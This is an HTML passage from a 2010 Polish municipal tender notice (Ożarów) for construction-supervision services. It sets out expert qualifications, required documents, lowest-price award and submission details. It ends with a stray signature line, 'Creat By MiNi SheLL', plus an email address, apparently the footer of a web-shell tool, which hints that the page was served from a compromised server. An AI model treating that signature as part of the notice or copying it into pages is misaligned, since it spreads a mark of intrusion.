wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie Wykonawca potwierdzi spełnianie warunków udziału w postępowaniu, jeżeli wykaże, że wykonał  co najmniej jedną co najmniej jedną usługę pełnienia funkcji Inżyniera/Inwestora Zastępczego o wartości co najmniej 50 000 zł, na kontrakcie obejmującym roboty budowlane.
Do pozycji z wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia.
Wykaz usług  - załącznik nr 2 do oferty
ocena na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć :
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż:
-Ekspert nr 1 Kierownik Zespołu (Inżynier Rezydent) posiadający:
- wykształcenie techniczne, ekonomiczne, prawnicze,
- minimum 5-letnie doświadczenie zawodowe,
- doświadczenie w pełnieniu funkcji Kierownika Zespołu/Inżyniera Rezydenta
na jednym kontrakcie obejmującym roboty budowlane, zrealizowanym w
oparciu o warunki kontraktu FIDIC lub równoważne, współfinansowanym
ze środków Unii Europejskiej,
Ekspert nr 2 Inspektor nadzoru w specjalności konstrukcyjno-budowlanej
posiadający:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe,
- doświadczenie w pełnieniu funkcji inspektora nadzoru robót budowlanych
na jednym kontrakcie obejmującym roboty budowlane w zakresie
budowy/rozbudowy obiektu budowlanego,
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń
w specjalności konstrukcyjno-budowlanej,
- wpis na listę członków właściwej izby samorządu zawodowego;
Ekspert nr 3 Inspektor nadzoru w specjalności sanitarnej posiadający:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe,
- doświadczenie w pełnieniu funkcji inspektora nadzoru robót budowlanych
na jednym kontrakcie obejmującym roboty w zakresie instalacji sanitarnej
w obiekcie budowlanym,
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,
gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
- wpis na listę członków właściwej izby samorządu zawodowego;
 Ekspert nr 4 Specjalista ds. rozliczeń - posiadający:
- wykształcenie minimum średnie,
- doświadczenie w prowadzeniu obmiarów i analizy kosztów budowy, na co
najmniej jednym kontrakcie na roboty budowlane, współfinansowanym ze
środków Unii Europejskiej.
UWAGA:
Zamawiający dopuszcza jednoczesne pełnienie przez 1 osobę funkcji Eksperta w kilku
wymienionych powyżej funkcjach, pod warunkiem jednoczesnego posiadania
odpowiedniego wykształcenia, doświadczenia i uprawnień. Powyższe dotyczy również
Eksperta nr 1.
UWAGA:
Zamawiający żąda zapewnienia przez Wykonawcę co najmniej jednej osoby biegle
posługującej się językiem angielskim.
Wykaz osób załącznik nr 3 do oferty
Do oferty należy dołączyć Oświadczenie o posiadaniu wymaganych uprawnień, który stanowi załącznik nr 4 do oferty
ocena nastąpi na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożyć oświadczenie na załączonym druku- załącznik nr 1 do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ozarow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Ożarów, ul. Stodolna 1, 27-530 Ożarów, Referat Planowania Przestrzennego Inwestycji i Gospodarki Komunalnej pokój nr 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 10:00, miejsce: Urząd Miasta i Gminy Ożarów, ul. Stodolna 1, 27-530 Ożarów, pokój nr 11 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinasowany z mechanizmu finansowego EOG i Norweskiego Mechanizmu
Finansowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com